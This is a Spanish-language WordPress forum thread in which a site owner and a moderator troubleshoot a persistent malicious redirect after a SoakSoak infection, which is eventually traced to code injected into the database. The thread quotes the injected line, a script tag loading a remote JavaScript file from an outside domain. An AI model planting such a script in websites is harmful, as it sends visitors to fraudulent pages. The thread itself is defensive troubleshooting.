Soporte » Seguridad » Redirección escondida en la web

  • Resuelto fartys

    (@fartys)


    Hola. En primer lugar he buscado y no he encontrado el mismo problema en los foros. Mi problema es que mi web fue atacada por el virus SoakSoak, o al menos eso creo. Mi proveedor de hosting me puso la web en cuarentena. Después de hacer de todo para arreglarlo consigo que el proveedor me de el visto bueno y me dice que la web esta limpia.

    El caso es que aun estando limpia en mi web, al hacer click por primera vez en cualquier lado, me lleva a una página falsa de Aliexpress. Antes aparecía un codigo iframe en el código fuente que hacia esa función pero ahora ni aparece. He buscado en el código y no consigo encontrar nada y no se como quitarlo.

    Si conocen como resolver mi error… he reinstalado wordpress, desactivado/reinstalado/actualizado plugins… ya no se que mas hacer. Muchas gracias.

Viendo 13 respuestas - de la 1 a la 13 (de un total de 13)
  • Moderador erchache2000

    (@erchache2000)

    1- cambia todas las contraseñas de tu hosting.

    2- Comprueba que tienes una instalación limpia de WordPress, es decir, que te has bajado los archivos de WordPress.org y los temas y plugins los has instalado desde el panel de administración de tu instancia WordPress.

    Hola erchache2000, ya he realizado varias veces tus indicaciones, pero no he obtenido ningun resultado positivo. Muchas gracias!

    Moderador erchache2000

    (@erchache2000)

    Habla de nuevo con tu hosting, porque puede que sea un falso positivo.

    Mira en http://sitecheck.sucuri.net si tu web sigue infectada o no.

    He hablado con mi hosting y dice que está bien. Desde esa web me dice que no hay peligro de malware.

    Está el tema dificil :S

    Si miro el código fuente de mi web desde el navegador veo esto:

    «<script src=»http://bwinpoker24.com/click7.js» type=»text/javascript»></script>»

    que es lo que provoca la redirección. En cambio, si reviso en todo el código de mi web no encuentro nada que haga referencia a esa línea de código. No sé que o como la introduce ahí.

    ¿Alguien sabe algo?

    Moderador erchache2000

    (@erchache2000)

    Se te habrá colado en el tema o algún plugin. O tal vez aprovechando una incorrecta configuración de permisos modificaron los archivos.

    Revisa el tema y plugins activos, a ver si encuentras ese script y eliminalo.

    No encuentro referencias en ningún lado a ese script y he revisado todo el código :S

    Moderador erchache2000

    (@erchache2000)

    Pues si te sigue saliendo ese enlace es tu hosting o tu proveedor de dominio el que lo inyecta.

    ¿Es un hosting o proveedor dns gratuito lo que usas? A ver si te están colando publicidad…

    No, es un hosting de pago, exactamente Dinahosting. Hablé con ellos y decían que no era cosa suya.

    Moderador erchache2000

    (@erchache2000)

    He buscado con Google y por lo visto es un plugin vulnerable el que tienes que actualizar.

    ¿Usas alguno de estos plugins? Slider Revolution or Showbiz Pro

    Efectivamente el plugin que daba el problema es Slider Revolution (RevSlider) el cual he actualizado y arregla la vulnerabilidad. Pero no del todo supuestamente.

    Te comento las ultimas pruebas que hice, ya de locura o desesperación. A través de FTP he borrado todo, la plantilla que uso y todos (todos) los plugins, borrado carpetas y susitutyendolas por las originales de la ultima versión de WordPress. Es decir, lo he dejado como nuevo y sigue ahí el problema.

    Estoy empezando a pensar que no es culpa mía el fallo. Que es del proveedor, que esta haciendo algo mal porque yo no se donde más buscar.

    Moderador erchache2000

    (@erchache2000)

    Elimina el plugin, vuelve a pasar el sucuri y si no canta error problema resuelto.

    Buenas. Eso que me has dicho ya lo había probado. Sucuri dejo de cantar en el momento que actualice el plugin y limpie la web, pero los problemas seguían ahi aun asi.

    Ayer encontré la solución el problema estaba oculto en la base de datos. Tuve que borrar manualmente el código que habían inyectado y solucionado.

    Un saludo y muchísimas gracias por la ayuda.

Viendo 13 respuestas - de la 1 a la 13 (de un total de 13)
  • El debate ‘Redirección escondida en la web’ está cerrado a nuevas respuestas.